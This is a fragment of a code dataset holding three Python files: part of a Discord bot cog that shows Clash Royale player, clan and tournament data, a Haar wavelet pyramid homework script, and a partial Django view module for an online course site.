\"\"\"Check if war trophies exists for the clan\"\"\"\n clankey = await self.clans.getClanKey(tag)\n if clankey is not None:\n return await self.clans.getClanData(clankey, 'warTrophies')\n return None\n\n async def getClanLeader(self, members):\n \"\"\"Return clan leader from a list of members\"\"\"\n for member in members:\n if member.role == \"leader\":\n arenaFormat = member.arena.arena.replace(' ', '').lower()\n return \"{} {}\".format(self.emoji(arenaFormat), member.name)\n\n def sec2tme(self, sec):\n \"\"\"Converts seconds to readable time\"\"\"\n m, s = divmod(sec, 60)\n h, m = divmod(m, 60)\n\n if h is 0:\n if m is 0:\n return \"{} seconds\".format(s)\n else:\n return \"{} minutes, {} secs\".format(m, s)\n else:\n return \"{} hour, {} mins\".format(h, m)\n\n @commands.command(pass_context=True, aliases=['clashprofile'])\n async def clashProfile(self, ctx, member: discord.Member=None):\n \"\"\"View your Clash Royale Profile Data and Statstics.\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player(profiletag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. 
Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n if profiledata.clan is None:\n clanurl = \"https://i.imgur.com/4EH5hUn.png\"\n else:\n clanurl = profiledata.clan.badge.image\n\n arenaFormat = profiledata.arena.arena.replace(' ', '').lower()\n\n embed = discord.Embed(color=0xFAA61A)\n embed.set_author(name=profiledata.name + \" (#\"+profiledata.tag+\")\", icon_url=clanurl, url=\"https://royaleapi.com/player/\"+profiledata.tag)\n embed.set_thumbnail(url=\"https://royaleapi.github.io/cr-api-assets/arenas/{}.png\".format(arenaFormat))\n embed.add_field(name=\"Trophies\", value=\"{} {:,}\".format(self.emoji(arenaFormat), profiledata.trophies), inline=True)\n embed.add_field(name=\"Highest Trophies\", value=\"{} {:,}\".format(self.emoji(arenaFormat), profiledata.stats.max_trophies), inline=True)\n embed.add_field(name=\"Level\", value=\"{} {}\".format(self.emoji(\"level\"), profiledata.stats.level), inline=True)\n if profiledata.clan is not None:\n embed.add_field(name=\"Clan {}\".format(profiledata.clan.role.capitalize()),\n value=\"{} {}\".format(await self.getClanEmoji(profiledata.clan.tag), profiledata.clan.name), inline=True)\n embed.add_field(name=\"Cards Found\", value=\"{} {}/86\".format(self.emoji(\"card\"), profiledata.stats.cards_found), inline=True)\n embed.add_field(name=\"Favourite Card\", value=\"{} {}\".format(self.emoji(profiledata.stats.favorite_card.name.replace(\" \", \"\")),\n profiledata.stats.favorite_card.name), inline=True)\n embed.add_field(name=\"Games Played\", value=\"{} {:,}\".format(self.emoji(\"battle\"), profiledata.games.total), inline=True)\n embed.add_field(name=\"Tourney Games Played\", value=\"{} {:,}\".format(self.emoji(\"tourney\"), profiledata.games.tournament_games), inline=True)\n embed.add_field(name=\"Wins/Draws/Losses\", value=\"{:,}/{:,}/{:,}\".format(profiledata.games.wins, profiledata.games.draws,\n profiledata.games.losses), inline=True)\n embed.add_field(name=\"War Day Wins\", value=\"{} {}\".format(self.emoji(\"warwin\"), profiledata.games.war_day_wins), inline=True)\n embed.add_field(name=\"Three Crown Wins\", value=\"{} {:,}\".format(self.emoji(\"3crown\"), profiledata.stats.three_crown_wins), inline=True)\n embed.add_field(name=\"Total Donations\", value=\"{} {:,}\".format(self.emoji(\"card\"), profiledata.stats.total_donations), inline=True)\n embed.add_field(name=\"Donations Recieved\", value=\"{} {:,}\".format(self.emoji(\"card\"), profiledata.stats.clan_cards_collected), inline=True)\n embed.add_field(name=\"Challenge Max Wins\", value=\"{} {}\".format(self.emoji(\"tourney\"), profiledata.stats.challenge_max_wins), inline=True)\n embed.add_field(name=\"Challenge Cards Won\", value=\"{} {:,}\".format(self.emoji(\"cards\"), profiledata.stats.challenge_cards_won), inline=True)\n embed.add_field(name=\"Tournament Cards Won\", value=\"{} {:,}\".format(self.emoji(\"cards\"), profiledata.stats.tournament_cards_won), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def chests(self, ctx, member: discord.Member=None):\n \"\"\"View your upcoming chest cycle for Clash Royale.\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player_chests(profiletag)\n except clashroyaleAPI.RequestError:\n await 
self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n mapEmoji = {\n 'silver': 'silver',\n 'gold': 'gold',\n 'giant': 'giant',\n 'epic': 'epic',\n 'super magical': 'super',\n 'magical': 'magic',\n 'legendary': 'legendary'\n }\n\n valuechestText = ' '.join(profiledata.upcoming)\n for chest in mapEmoji.keys():\n valuechestText = valuechestText.replace(chest, self.emoji(mapEmoji[chest]))\n\n chestList = [\n \"{} +{}\".format(self.emoji(\"giant\"), profiledata.giant+1),\n \"{} +{}\".format(self.emoji(\"epic\"), profiledata.epic+1),\n \"{} +{}\".format(self.emoji(\"magic\"), profiledata.magical+1),\n \"{} +{}\".format(self.emoji(\"super\"), profiledata.super_magical+1),\n \"{} +{}\".format(self.emoji(\"legendary\"), profiledata.legendary+1),\n ]\n\n embed = discord.Embed(title=\"\", color=0xFAA61A, description=\"Your Upcoming chests.\")\n embed.set_thumbnail(url=\"https://cdn.discordapp.com/emojis/385784630227369985.png\")\n embed.set_author(name=\"{} (#{})\".format(member.name, profiletag))\n embed.add_field(name=\"Upcoming Chests\", value=valuechestText, inline=False)\n embed.add_field(name=\"Special Chests\", value=\" \".join(chestList), inline=False)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True, aliases=['clashdeck'])\n async def clashDeck(self, ctx, member: discord.Member=None):\n \"\"\"View yours or other's clash royale Deck\"\"\"\n\n member = member or ctx.message.author\n\n await self.bot.type()\n\n try:\n profiletag = await self.tags.getTag(member.id)\n profiledata = await self.clash.get_player(profiletag, keys=\"deckLink\")\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n except KeyError:\n await self.bot.say(\"You need to first save your profile using ``{}save #GAMETAG``\".format(ctx.prefix))\n return\n\n message = ctx.message\n message.content = ctx.prefix + \"deck gl \" + profiledata.deck_link\n message.author = member\n\n await self.bot.process_commands(message)\n\n @commands.command(pass_context=True)\n async def clan(self, ctx, clantag):\n \"\"\"View Clash Royale Clan statistics and information \"\"\"\n\n await self.bot.type()\n\n try:\n clandata = await self.clash.get_clan(clantag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. 
Please try again later.\")\n return\n\n embed = discord.Embed(description=clandata.description, color=0xFAA61A)\n embed.set_author(name=clandata.name + \" (#\"+clandata.tag+\")\",\n icon_url=clandata.badge.image,\n url=\"https://legendclans.com/clanInfo/\"+clandata.tag)\n embed.set_thumbnail(url=clandata.badge.image)\n embed.add_field(name=\"Members\", value=\"{} {}/50\".format(self.emoji(\"members\"), clandata.member_count), inline=True)\n embed.add_field(name=\"Leader\", value=await self.getClanLeader(clandata.members), inline=True)\n embed.add_field(name=\"Donations\", value=\"{} {:,}\".format(self.emoji(\"cards\"), clandata.donations), inline=True)\n embed.add_field(name=\"Score\", value=\"{} {:,}\".format(self.emoji(\"PB\"), clandata.score), inline=True)\n\n warTrophies = await self.getClanWarTrophies(clandata.tag)\n if warTrophies is not None:\n embed.add_field(name=\"War Trophies\",\n value=\"{} {:,}\".format(self.getLeagueEmoji(warTrophies), warTrophies), inline=True)\n\n embed.add_field(name=\"Required Trophies\",\n value=\"{} {:,}\".format(self.emoji(\"crtrophy\"), clandata.required_score), inline=True)\n embed.add_field(name=\"Status\", value=\":envelope_with_arrow: {}\".format(clandata.type.title()), inline=True)\n if clandata.location.is_country:\n embed.add_field(name=\"Country\",\n value=\":flag_{}: {}\".format(clandata.location.code.lower(), clandata.location.name), inline=True)\n else:\n embed.add_field(name=\"Location\", value=\":earth_americas: {}\".format(clandata.location.name), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True, aliases=['cw'])\n async def tournament(self, ctx, tag, password=None):\n \"\"\"View Clash Royale Tournament Information \"\"\"\n\n await self.bot.type()\n\n tag = await self.tags.formatTag(tag)\n\n if not await self.tags.verifyTag(tag):\n await self.bot.say(\"The ID you provided has invalid characters. Please try again.\")\n return\n\n await self.bot.delete_message(ctx.message)\n\n try:\n tourneydata = await self.clash.get_tournament(tag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: Tournament not found. 
Please double check your #TAG\")\n return\n\n maxPlayers = tourneydata.max_players\n cards = self.getCards(maxPlayers)\n coins = self.getCoins(maxPlayers)\n\n embed = discord.Embed(title=\"Click this link to join the Tournament in Clash Royale!\",\n url=\"https://legendclans.com/tournaments?id={}&pass={}\".format(tag, password), color=0xFAA61A)\n embed.set_thumbnail(url='https://statsroyale.com/images/tournament.png')\n\n embed.set_author(name=\"{} (#{})\".format(tourneydata.name, tourneydata.tag),\n url=\"https://royaleapi.com/tournament/\" + tourneydata.tag)\n\n embed.add_field(name=\"Players\", value=\"{} {}/{}\".format(self.emoji(\"members\"),\n tourneydata.current_players,\n maxPlayers), inline=True)\n embed.add_field(name=\"Status\", value=tourneydata.status.title(), inline=True)\n\n if not tourneydata.open:\n if password is not None:\n embed.add_field(name=\"Password\", value=\"```{}```\".format(password), inline=True)\n else:\n await self.bot.say(\"Error: Please enter a tournament password.\")\n return\n\n if tourneydata.status != \"ended\":\n\n if tourneydata.status != \"inProgress\":\n startTime = self.sec2tme((tourneydata.create_time + tourneydata.prep_time) - int(time.time()))\n embed.add_field(name=\"Starts In\", value=startTime, inline=True)\n\n endTime = self.sec2tme((tourneydata.create_time + tourneydata.prep_time + tourneydata.duration) - int(time.time()))\n embed.add_field(name=\"Ends In\", value=endTime, inline=True)\n\n embed.add_field(name=\"Hosted By\", value=tourneydata.creator.name, inline=True)\n embed.add_field(name=\"Top prize\", value=\"{} {} {} {}\".format(self.emoji(\"tournamentcards\"),\n cards,\n self.emoji(\"coin\"),\n coins), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def save(self, ctx, profiletag: str, member: discord.Member=None):\n \"\"\" save your Clash Royale Profile Tag\n\n Example:\n [p]save #CRRYTPTT @GR8\n [p]save #CRRYRPCC\n \"\"\"\n\n server = ctx.message.server\n author = ctx.message.author\n\n profiletag = await self.tags.formatTag(profiletag)\n\n if not await self.tags.verifyTag(profiletag):\n await self.bot.say(\"The ID you provided has invalid characters. 
Please try again.\")\n return\n\n await self.bot.type()\n\n allowed = False\n if member is None:\n allowed = True\n elif member.id == author.id:\n allowed = True\n else:\n botcommander_roles = [discord.utils.get(server.roles, name=r) for r in BOTCOMMANDER_ROLES]\n botcommander_roles = set(botcommander_roles)\n author_roles = set(author.roles)\n if len(author_roles.intersection(botcommander_roles)):\n allowed = True\n\n if not allowed:\n await self.bot.say(\"You dont have enough permissions to set tags for others.\")\n return\n\n member = member or ctx.message.author\n\n try:\n profiledata = await self.clash.get_player(profiletag)\n\n checkUser = await self.tags.getUser(server.members, profiletag)\n if checkUser is not None:\n await self.bot.say(\"Error, This Player ID is already linked with **\" + checkUser.display_name + \"**\")\n return\n\n await self.tags.linkTag(profiletag, member.id)\n\n embed = discord.Embed(color=discord.Color.green())\n avatar = member.avatar_url if member.avatar else member.default_avatar_url\n embed.set_author(name='{} (#{}) has been successfully saved.'.format(profiledata.name, profiletag),\n icon_url=avatar)\n await self.bot.say(embed=embed)\n except clashroyaleAPI.NotFoundError:\n await self.bot.say(\"We cannot find your ID in our database, please try again.\")\n return\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n\n\ndef setup(bot):\n bot.add_cog(clashroyale(bot))\n","sub_path":"clashroyale/clashroyale.py","file_name":"clashroyale.py","file_ext":"py","file_size_in_byte":17581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347269384","text":"## Default modules imported. Import more if you need to.\n\nimport numpy as np\nfrom skimage.io import imread, imsave\nfrom scipy.signal import convolve2d as conv2\n\n## Fill out these functions yourself\n\ndef im2wv(img,nLev):\n # Placeholder that does nothing\n length = img.shape[0] # suppose input image is a square\n kernel = np.array([[1,-1,-1,1],\n [1,1,-1,-1],\n [1,-1,1,-1],\n [1,1,1,1]])\n kernel = 1/2 * kernel\n V = []\n\n if nLev < np.sqrt(length):\n for lev in range(nLev):\n length = img.shape[0]\n region = int(length/2)\n L = np.zeros((region,region), dtype=np.float32)\n H1 = np.zeros((region,region), dtype=np.float32)\n H2 = np.zeros((region,region), dtype=np.float32)\n H3 = np.zeros((region,region), dtype=np.float32)\n V_output = []\n\n for i in range(0, length, 2):\n for j in range(0, length, 2):\n\n region = img[i:i+2, j:j+2].reshape(1,4)\n map = np.dot(region, kernel)\n newi = int(i/2)\n newj = int(j/2)\n L[newi,newj] = map[0,0]\n H2[newi,newj] = map[0,1]\n H1[newi,newj] = map[0,2]\n H3[newi,newj] = map[0,3]\n\n V_output.append(H1)\n V_output.append(H2)\n V_output.append(H3)\n img = L\n print(L.shape)\n\n V.append(V_output)\n V.append(img)\n\n return V\n\n\ndef wv2im(pyr):\n # Placeholder that does nothing\n level = len(pyr)-1\n origsize = (pyr[0][0].shape[0])*2\n image = pyr[level] # update it later\n orikernel = np.array([[1, -1, -1, 1],\n [1, 1, -1, -1],\n [1, -1, 1, -1],\n [1, 1, 1, 1]])\n orikernel = 1 / 2 * orikernel\n kernel = np.linalg.inv(orikernel)\n\n for le in range(level):\n H1, H2, H3 = pyr[level-1-le]\n print(H1.shape)\n Lscalar = image.reshape(1, image.size)\n H1Scalar = H1.reshape(1, H1.size)\n H2Scalar = H2.reshape(1, H2.size)\n H3Scalar = H3.reshape(1, H3.size)\n All = np.zeros((4, image.size), dtype=np.float32)\n All[0,:] = Lscalar\n All[1,:] = H2Scalar\n All[2,:] = H1Scalar\n All[3,:] = H3Scalar\n\n length = image.shape[0]\n newimage = np.zeros((length*2, length*2), dtype=np.float32)\n j = 0\n for i in range(All.shape[1]):\n dd = All[:, i].reshape(1, 4)\n origin = np.dot(dd, kernel)\n newimage[2*(i // length), 2 * (i % length)] = origin[0, 0]\n newimage[2*(i // length), 2 * (i % length) + 1] = origin[0, 1]\n newimage[2*(i // length) + 1, 2 * (i % length)] = origin[0, 2]\n newimage[2*(i // length) + 1, 2 * (i % length) + 1] = origin[0, 3]\n image = newimage\n print(image.shape)\n\n return newimage\n\n\n########################## Support code below\n\nfrom os.path import normpath as fn # Fixes window/linux path conventions\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# Utility functions to clip intensities b/w 0 and 1\n# Otherwise imsave complains\ndef clip(im):\n return np.maximum(0.,np.minimum(1.,im))\n\n\n#Visualize pyramid like in slides\ndef vis(pyr, lev=0):\n if len(pyr) == 1:\n return pyr[0]/(2**lev)\n\n sz=pyr[0][0].shape\n sz1 = [sz[0]*2,sz[1]*2]\n img = np.zeros(sz1,dtype=np.float32)\n\n img[0:sz[0],0:sz[1]] = vis(pyr[1:],lev+1)\n\n # Just scale / shift gradient images for visualization\n img[sz[0]:, 0:sz[1]] = pyr[0][0]*(2**(1-lev))+0.5\n img[0:sz[0],sz[1]:] = pyr[0][1]*(2**(1-lev))+0.5\n img[sz[0]:, sz[1]:] = pyr[0][2]*(2**(1-lev))+0.5\n\n return img\n\n\n\n############# Main Program\n\n\nimg = np.float32(imread(fn('inputs/p6_inp.jpg')))/255. 
# img.shape = [256, 256]\n\n# Visualize pyramids\npyr = im2wv(img,1)\noutput = clip(vis(pyr))\nimsave(fn('outputs/prob6a_1.jpg'),clip(vis(pyr)))\n\npyr = im2wv(img,2)\nimsave(fn('outputs/prob6a_2.jpg'),clip(vis(pyr)))\n\npyr = im2wv(img,3)\nimsave(fn('outputs/prob6a_3.jpg'),clip(vis(pyr)))\n\n# Inverse transform to reconstruct image\noriginal = wv2im(pyr)\nim = clip(original)\nimsave(fn('outputs/prob6b.jpg'),im)\n\n# Zero out some levels and reconstruct\nfor i in range(len(pyr)-1):\n\n for j in range(3):\n pyr[i][j][...] = 0.\n\n im = clip(wv2im(pyr))\n imsave(fn('outputs/prob6b_%d.jpg' % i),im)\n","sub_path":"pset1/code/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
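The per-pixel loops in im2wv above cost O(N^2) Python iterations per level; one 2x2 Haar analysis step can instead be done with four array slices. A vectorized sketch of a single level, using the same band definitions as the kernel columns above (not a drop-in replacement for the pyramid bookkeeping):

import numpy as np


def haar_level(img):
    """One 2x2 Haar analysis step on an even-sized grayscale image."""
    a = img[0::2, 0::2]  # top-left pixel of each 2x2 block
    b = img[0::2, 1::2]  # top-right
    c = img[1::2, 0::2]  # bottom-left
    d = img[1::2, 1::2]  # bottom-right
    L = (a + b + c + d) / 2.0    # low-pass / average band
    H1 = (-a - b + c + d) / 2.0  # vertical detail (bottom minus top)
    H2 = (-a + b - c + d) / 2.0  # horizontal detail (right minus left)
    H3 = (a - b - c + d) / 2.0   # diagonal detail
    return L, (H1, H2, H3)


demo = np.arange(16, dtype=np.float32).reshape(4, 4)
L, (H1, H2, H3) = haar_level(demo)
print(L.shape)  # (2, 2): each band is half the size per axis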
+{"seq_id":"88503694","text":"# -*- coding:utf-8 -*-\nfrom django.template import RequestContext\nfrom django.http import FileResponse\nfrom django.shortcuts import render_to_response, HttpResponseRedirect, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom Mooc.models import *\nfrom Mooc.forms import *\nimport urllib2\nimport StringIO\nimport random\nimport datetime\nfrom os import environ\n#from sae.ext.storage import monkey\nfrom django.http import JsonResponse\nfrom django.template import Context,loader\nfrom django.http import HttpResponse\nimport os\n# Create your views here.\nSTUDY_TIME_INF = 2999\n\n\ndef ren2res(template, request, dic={}):\n if request.user.is_authenticated():\n dic.update({'user': {'id': request.user.id, 'name': request.user.get_username()}})\n userinfo = request.user.info\n dic.update({'userinfo': userinfo})\n else:\n dic.update({'user': False})\n if request:\n return render_to_response(template, dic, context_instance=RequestContext(request))\n else:\n return render_to_response(template, dic)\n\n\ndef home(request):\n courses = list(Course.objects.all().order_by('id')[0:6])\n if Course.objects.all().count() > len(courses):\n Flag = True\n else:\n Flag = False\n courseclass = 'all'\n number=2\n courses_num=[]\n for i in range(0,len(courses)):\n if((i+1)%3 == 1):\n courses_num.append([courses[i],0])\n print(courses[i].img)\n elif ((i+1)%3 == 2):\n courses_num.append([courses[i],-1])\n print(courses[i].img)\n else:\n courses_num.append([courses[i],1])\n print(courses[i].img)\n #推荐课程\n str = ['first','second','third']\n course_like = list(Course.objects.all().order_by('-likeCounter')[0:3])\n courses_like = []\n for i in range(0,3):\n courses_like.append([course_like[i],str[i]])\n return ren2res('index.html', request, {'courses_num': courses_num,'courseclass':courseclass,'number':number,'Flag':Flag,'courses_like':courses_like,})\n\n\ndef login(request):\n print('login')\n # 第一次请求到get方法,返回页面\n if request.method == 'GET':\n # 匿名用户说明未登陆\n if request.user.is_anonymous():\n # 后继访问请求\n request.session['login_from'] = request.META.get('HTTP_REFERER', '/')\n loginform = LoginForm()\n return ren2res('./user/login.html', request, {'loginform': loginform})\n else:\n # 已登录用户,登陆无效\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n # post方法,包含了name pw\n elif request.method == 'POST':\n # 验证身份\n loginform = LoginForm(request.POST)\n # 用于判断登录的表单的数据是否合法\n if loginform.is_valid():\n username = loginform.cleaned_data['username']\n password = loginform.cleaned_data['password']\n user = auth.authenticate(username=username, password=password)\n\n print(request.META.get('HTTP_REFERER'))\n str_list = request.META.get('HTTP_REFERER').split('/')\n str_http = ''\n k=0\n for i in range(0,len(str_list)):\n if str_list[i] == '?next=':\n k=1\n elif k:\n str_http += '/'+str_list[i]\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect(str_http)\n else:\n # 按说不会到这一步,如果到了就是写错了\n #这一步应该是用户名,密码不匹配才执行吧\n return ren2res('./user/login.html', request, {'loginform': loginform})\n else:\n return ren2res('./user/login.html', request, {'loginform': loginform})\n\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect('/')\n\n\ndef register(request):\n if request.method == 'GET':\n registerform = RegisterForm()\n return ren2res('./user/register.html', request, {'registerform': registerform})\n elif request.method == 'POST':\n print(request.POST)\n registerform = 
RegisterForm(request.POST)\n if registerform.is_valid():\n username = registerform.cleaned_data['username']\n password1 = registerform.cleaned_data['password1']\n password2 = registerform.cleaned_data['password2']\n nickname = registerform.cleaned_data['nickname']\n # 先不保存下列信息,改到个人主页再填写\n # school = registerform.cleaned_data['school']\n # birthday = registerform.cleaned_data['birthday']\n # sex = registerform.cleaned_data['sex']\n # userform = {'username': username, 'password1': password1, 'pass2': password2,\n # 'nickname': nickname, 'school': school, 'birthday': birthday, 'sex': sex}\n # 用于存储用户信息\n newuser = User()\n newuser.username = username\n newuser.set_password(password1)\n newuser.save()\n newuserinfo = UserInfo(user=newuser, nickname=nickname)\n newuserinfo.save()\n user = auth.authenticate(username=username, password=password1)\n auth.login(request, user)\n return HttpResponseRedirect('/')\n else:\n print('error')\n registerform.password1 = ''\n registerform.password2 = ''\n try:\n username_error = str(registerform.errors['username'])[26:-10]\n except:\n username_error=None;\n\n try:\n password1_error = str(registerform.errors['password1'])[26:-10]\n except:\n password1_error=None;\n\n try:\n password2_error = str(registerform.errors['password2'])[26:-10]\n except:\n password2_error=None;\n registerform.errors.clear()\n return ren2res('./user/register.html', request, {'registerform': registerform,'username_error':username_error,\n 'password1_error':password1_error,'password2_error':password2_error})\n\n@login_required\ndef change_pass(request):\n old = str(request.POST.get('old'))\n new1 = str(request.POST.get('new1'))\n new2 = str(request.POST.get('new2'))\n #print(old+new1+new2)\n username = request.user.username\n #print('username='+str(username))\n user = auth.authenticate(username=username, password=old)\n #print(request.user)\n if user is None:\n print('error1')\n message = u'原密码错误'\n return JsonResponse({'message':message})\n elif new1 != new2:\n message = u'两次密码不一致'\n return JsonResponse({'message':message})\n else:\n user.set_password(new1)\n user.save()\n message = u'保存成功'\n auth.login(request, user)\n return JsonResponse({'message':message})\n\n@login_required\ndef change_info(request):\n sex = request.POST.get('sex')\n birthday = request.POST.get('birthday')\n school = request.POST.get('school')\n userinfo = request.user.info\n if sex is not None:\n userinfo.sex = sex\n if birthday != '':\n userinfo.birthday = birthday\n if school is not None:\n userinfo.school = school\n try:\n content = request.FILES[\"file1\"]\n online = environ.get(\"APP_NAME\", \"\")\n if len(content) != 0 and online:\n import sae.const\n access_key = sae.const.ACCESS_KEY\n secret_key = sae.const.SECRET_KEY\n appname = sae.const.APP_NAME\n domain_name = \"mooc\"\n import sae.storage\n s = sae.storage.Client()\n ob = sae.storage.Object(content.read())\n dir = 'img/user/'+str(request.user.id)\n url = s.put(domain_name, dir, ob)\n userinfo.img = url\n except Exception:\n print(1)\n userinfo.save()\n return JsonResponse({'message': u'个人信息修改成功!', 'user_img': userinfo.img})\n\n@login_required\ndef course_summary(request, cid):\n #try:\n if True:\n servertime = datetime.date.today()\n course = Course.objects.get(id=cid)\n units = course.units.all().order_by('counter')\n unit_sum = len(units)\n begintime = course.cur_time.begin_time # .replace(tzinfo=None)\n time_list = course.times.all().order_by('begin_time')\n # total_hour是一门课总共需要的小时数\n total_days = 0\n for unit in units:\n total_days += 
unit.gap_days\n # delta_hour是距今为止这门课经历的小时数\n delta_days = int((servertime - begintime).days)\n if ((delta_days >= 0) and (delta_days > total_days)) or int(course.cur_time.begin_time.year) == STUDY_TIME_INF:\n old_time = course.cur_time\n old_time.cur_course = None\n old_time.save()\n for t in time_list:\n delta = int((servertime - t.begin_time).days)\n if delta <= total_days:\n t.cur_course = course\n t.save()\n break\n if int(course.cur_time.begin_time.year) == STUDY_TIME_INF:\n # 排除bug,当没有一个time可以作为选课时间的时候\n click = False\n message = u'暂无课程安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message, 'unit_sum': unit_sum})\n # except Exception:\n # raise Http404\n if course is not None:\n result = StudyStatus.objects.filter(course=course, user=request.user)\n course_begintime = course.cur_time.begin_time\n times = []\n # 加上当前的开课日期\n times.append(course.cur_time)\n for time in time_list:\n begin_time = time.begin_time\n if int((servertime-begin_time).days) <= int((course.units.all()[0]).gap_days) and int(begin_time.year) != STUDY_TIME_INF:\n times.append(time)\n if len(result) == 0:\n if len(times) != 0:\n click = True\n message = u'报名选课'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n click = False\n message = u'暂无选课安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n # 选了这门课了\n studystatus = result[0]\n if studystatus.course_time.begin_time < course_begintime:\n # 询问用户是否重新选课\n if len(times) == 0:\n click = False\n message = u'暂无选课安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n click = True\n message = u'重新选课'\n warning_mess = u'重新选课后,关于这门课的所有学习记录都将被清除,请谨慎选择!'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'warning_mess': warning_mess,\n 'unit_sum': unit_sum})\n else:\n # 目前正在学习\n if course_begintime > servertime or course_begintime < studystatus.course_time.begin_time:\n # 还未开课\n click = False\n message = u'等待开课'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message,\n 'studystatus': studystatus, 'unit_sum': unit_sum})\n else:\n # 可以学习\n click = True\n message = u'开始学习'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message,\n 'studystatus': studystatus, 'unit_sum': unit_sum})\n else:\n raise Http404\n\n\n@login_required\ndef study(request):\n course_id = request.GET.get('cid')\n if course_id is None:\n print('wtf?!')\n return HttpResponseRedirect('/')\n course_id = int(course_id)\n course = Course.objects.get(id=course_id)\n # 排除Url漏洞\n result = StudyStatus.objects.filter(course=course, user=request.user)\n if len(result) == 0:\n print('error0')\n return HttpResponseRedirect('/')\n # 获取服务器时间,课程开始时间\n servertime = datetime.date.today()\n course_begin_time = course.cur_time.begin_time\n # 判断课程是否开始\n if servertime < course_begin_time:\n # 课程未开始\n return HttpResponseRedirect('/course/' + 
str(course_id))\n else:\n print('coursestart')\n # 课程已开始执行else\n #获取将要学习的unit\n units = course.units.order_by('counter')\n delta_days = int((servertime - course_begin_time).days)\n gap_days = 0\n cnt = -1\n for unit in units:\n cnt += 1\n gap_days += unit.gap_days\n if gap_days >= delta_days:\n obj_unit = units[cnt]\n break\n print(obj_unit.counter)\n unit_cnt = request.GET.get('unit_cnt')\n if unit_cnt is None:\n # 直接给出当前unit的第一个section\n sections = obj_unit.sections.all().order_by('counter')\n section = sections[0]\n video = str(section.video)\n pdf = str(section.pdf)[5:]\n # 返回前更新一下section的访问信息\n section_cnt = 1\n unit_cnt = obj_unit.counter\n #------------------获取用户笔记--------------------------\n try:\n usernote = UserNote.objects.get(user_id=request.user.id,course=course,unit_counter=unit_cnt)\n except Exception:\n usernote=None\n #--------------------------------------------------------\n studystatus = StudyStatus.objects.get(course=course, user=request.user)\n result = studystatus.quizstore.filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(result) == 0:\n quizstore = QuizStore(unit_counter=unit_cnt, section_counter=section_cnt, studystatus=studystatus)\n else:\n quizstore = result[0]\n quizstore.visit = True\n quizstore.save()\n # 更新last_section\n studystatus.last_section = max(int(studystatus.last_section), int(section.total_counter))\n studystatus.save()\n return ren2res('./course/study.html', request, {'section': section, 'video': video, 'pdf': pdf,\n 'course': course, 'units': units, 'obj_unit': obj_unit,\n 'usernote':usernote,'course_id':course_id,'unit_cnt':unit_cnt,})\n unit_cnt = int(unit_cnt)\n section_cnt = request.GET.get('section_cnt')\n if section_cnt is None:\n return HttpResponseRedirect('/course/' + str(course_id))\n section_cnt = int(section_cnt)\n\n # 得到目标section\n try:\n section = course.units.all().get(counter=unit_cnt).sections.all().get(counter=section_cnt)\n except Exception:\n print('erroeqqq')\n raise Http404\n if section.unit.counter > obj_unit.counter:\n tmp_section = obj_unit.sections.all().order_by('-counter')[0]\n return HttpResponseRedirect(\n '/study/?cid=' + str(course_id) + '&unit_cnt=' + str(obj_unit.counter) + '§ion_cnt=' + str(\n tmp_section.counter))\n\n #------------------获取用户笔记--------------------------\n try:\n usernote = UserNote.objects.get(user_id=request.user.id,course=course,unit_counter=unit_cnt)\n except Exception:\n usernote=None\n #--------------------------------------------------------\n # 正常返回\n video = str(section.video)\n pdf = str(section.pdf)[5:]\n # 返回前更新一下section的访问信息\n studystatus = StudyStatus.objects.get(course=course, user=request.user)\n result = studystatus.quizstore.filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(result) == 0:\n quizstore = QuizStore()\n quizstore.unit_counter = unit_cnt\n quizstore.section_counter = 